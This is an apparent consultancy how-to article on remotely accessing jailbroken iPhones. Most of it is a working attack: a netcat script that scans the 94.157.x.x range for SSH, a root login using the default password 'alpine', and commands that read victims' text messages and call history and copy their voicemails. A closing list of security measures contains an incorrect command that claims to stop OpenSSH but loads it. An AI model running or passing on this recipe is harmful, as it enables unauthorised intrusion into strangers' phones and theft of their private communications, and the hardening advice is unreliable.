Howto access iPhones remotely using OpenSSH

A jail broken Apple iPhone with OpenSSH installed is accessible over the internet using ssh and the default root password "alpine".

You can use a short script to find IP addresses that have port 22 open and try to login. You can run this script from your Mac or any Linux machine.

#!/bin/sh

fourth=1
third=0

mkdir -p /tmp/scan-iphones/open
mkdir /tmp/scan-iphones/closed

while [ "$third" -lt 192 ] ; do
while [ "$fourth" -lt 255 ] ; do
  if [ ! -f /tmp/scan-iphones/94.157."$third"."$fourth" ] ; then
   if [ ! -f /tmp/scan-iphones/open/94.157."$third"."$fourth" ] ; then
    if [ ! -f /tmp/scan-iphones/closed/94.157."$third"."$fourth" ] ; then
     if [ -f /tmp/scan-iphones/stop ] ; then
      echo "Stopping because /tmp/scan-iphone/stop exists."
      exit 1
     fi
     touch /tmp/scan-iphones/94.157."$third"."$fourth"
     nc -w 1 -z 94.157."$third"."$fourth" 22-22 > /dev/null 2>&1 && touch /tmp/scan-iphones/open/94.157."$third"."$fourth" || touch /tmp/scan-iphones/closed/94.157."$third"."$fourth"
     rm /tmp/scan-iphones/94.157."$third"."$fourth"
    fi
   fi
  fi
fourth=$(($fourth+1))
done
fourth=1
third=$(($third+1))
done

The IP-addresses of IP-addresses that have port 22 open are stored in /tmp/scan-iphones/open/*. Some of these IP-addresses are not iPhones, so not every IP-address listed there are vulnerable. To stop the script press [CTRL]+[c] or type touch /tmp/scan-iphones/stop.

Now that you have IP addresses where you can login, use one of these "features":

Read all text messages

From your Mac or any Linux machine, type:

$ ssh [email protected]
# sqlite3 /private/var/mobile/Library/SMS/sms.db
SELECT * FROM message;

See the call history

From your Mac or any Linux machine, type:
$ ssh [email protected]
# sqlite3 /private/var/mobile/Library/CallHistory/call_history.db
SELECT * FROM call;

Listen to voicemails

From your Mac or any Linux machine, type:

$ scp [email protected]:/private/var/mobile/Library/Voicemail/*.amr .

Open the finder, drag the .amr files on Quicktime to listen to them.

To secure your iPhone, you can use one or more of these measures:

  • Change the "root" password - On the Terminal, type # passwd.
  • Change the "mobile" password - On the Terminal, type # passwd mobile.
  • Disable OpenSSH start at boot time - Don't know how to do this yet.
  • Stop OpenSSH for now - launchctl load -w /Library/LaunchDaemons/com.openssh.sshd.plist.
  • Set "PermitRootLogin" to "No" - in /private/etc/ssh/sshd_config.
  • If all fails: Uninstall OpenSSH - Using the tools that installed OpenSSH.
About Consultancy Articles Contact




References Red Hat Certified Architect By Robert de Bock Robert de Bock
Curriculum Vitae By Fred Clausen +31 6 14 39 58 72
By Nelson Manning [email protected]